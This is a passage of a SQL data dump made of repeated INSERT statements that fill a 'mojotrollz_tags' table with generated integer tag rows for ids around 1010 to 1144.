1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1010, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1010, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1011, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1011, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1012, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1012, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1013, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1013, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1014, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1014, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1015, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1015, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1016, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1016, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1017, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1017, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1018, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1018, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1019, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1019, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1020, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1020, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1021, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1021, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1022, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1022, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1023, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1023, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1024, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1024, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1025, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1025, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1026, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1026, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1027, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1027, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1028, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1028, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1029, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1029, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1030, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1030, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1031, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1031, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1032, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1032, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1033, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1033, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1034, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1034, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1035, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1035, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1036, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1036, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1037, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1037, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1038, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1038, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1039, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1039, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1040, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1040, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1041, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1041, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1042, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1042, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1043, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1043, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1044, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1044, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1045, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1045, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1046, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1046, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1047, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1047, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1048, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1048, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1049, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1049, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1050, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1050, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1051, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1051, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1052, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1052, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1053, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1053, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1054, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1054, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1057, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1057, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1059, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1059, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1060, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1060, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1061, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1061, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1062, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1062, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1063, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1063, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1064, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1064, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1065, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1065, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1068, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1068, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1069, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1069, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1070, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1070, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1071, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1071, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1072, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1072, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1073, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1073, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1074, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1074, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1075, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1075, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1076, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1076, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1077, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1077, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1078, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1078, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1081, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1081, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1082, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1082, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1083, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1083, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1084, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1084, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1085, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1085, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1087, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1087, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1088, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1088, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1089, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1089, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1090, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1090, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1091, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1091, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1092, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1092, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1093, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1093, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1094, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1094, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1095, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1095, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1096, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1096, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1097, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1097, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1098, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1099, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1100, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1101, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1103, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1103, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1104, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1104, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1105, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1105, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1106, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1106, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1108, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1108, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1109, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1109, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1110, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1110, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1111, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1111, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1112, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1112, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1114, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1114, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1115, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1115, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1116, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1116, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1117, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1118, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1118, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1119, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1119, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1120, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1120, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1121, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1121, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1122, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1122, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1123, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1123, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1124, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1124, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1125, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1125, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1126, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1126, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1127, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1127, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1128, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1128, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1129, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1130, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1130, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1131, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1131, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1132, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1132, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1133, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1133, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1134, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1134, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1135, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1135, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1137, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1137, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1138, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1138, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1139, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1139, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1140, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1140, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1141, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1141, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1142, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1142, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1144, 1, 1, 